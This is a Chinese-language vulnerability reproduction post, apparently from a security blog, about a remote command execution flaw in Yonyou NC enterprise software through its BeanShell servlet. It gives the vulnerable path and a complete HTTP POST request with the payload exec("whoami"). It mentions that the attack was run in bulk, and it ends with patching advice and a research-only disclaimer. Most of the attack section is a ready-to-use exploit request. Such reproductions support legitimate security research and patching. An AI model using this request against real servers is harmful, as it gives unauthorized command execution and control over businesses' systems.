X友 NC 遠程命令執(zhí)行
一、漏洞簡介
用友NC是一款企業(yè)級管理軟件,在大中型企業(yè)廣泛使用。實現(xiàn)建模、開發(fā)、繼承、運行、管理一體化的IT解決方案信息化平臺。
用友NC存在反序列化漏洞,攻擊者通過構造特定的HTTP請求,可以在目標服務器上遠程執(zhí)行任意命令。(用友 NC bsh.servlet.BshServlet 存在遠程命令執(zhí)行漏洞,通過BeanShell 執(zhí)行遠程命令獲取服務器權限。)
二、漏洞影響
用友NC 全版本
三、漏洞復現(xiàn)
主頁樣式
漏洞url:
/servlet/~ic/bsh.servlet.BshServlet
訪問執(zhí)行:
exec("whoami");
詳細數(shù)據(jù)包:
POST /servlet/~ic/bsh.servlet.BshServlet
host: 127.0.0.1:8080
user-agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
bsh.script=exec("whoami");
簡單批量一下
四、修復建議
1、用友NC為商業(yè)軟件,可直接聯(lián)系用友官方獲得安全升級方案。
2、在官方安全補丁發(fā)布之前,建議相關企業(yè)嚴格限制用友NC的訪問權限,禁止外部IP請求用友NC應用。
參考:
https://blog.csdn.net/weixin_45728976/article/details/106560286
http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20bsh.servlet.BshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html?h=%E7%94%A8%E5%8F%8B%20NC%20bsh.servlet.BshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E
往期用友漏洞:
注意:??
免責聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
如果本文內(nèi)容侵權或者對貴公司業(yè)務或者其他有影響,請聯(lián)系作者刪除。
轉(zhuǎn)載聲明:著作權歸作者所有。商業(yè)轉(zhuǎn)載請聯(lián)系作者獲得授權,非商業(yè)轉(zhuǎn)載請注明出處。
訂閱查看更多復現(xiàn)文章、學習筆記
thelostworld
安全路上,與你并肩前行!!!!
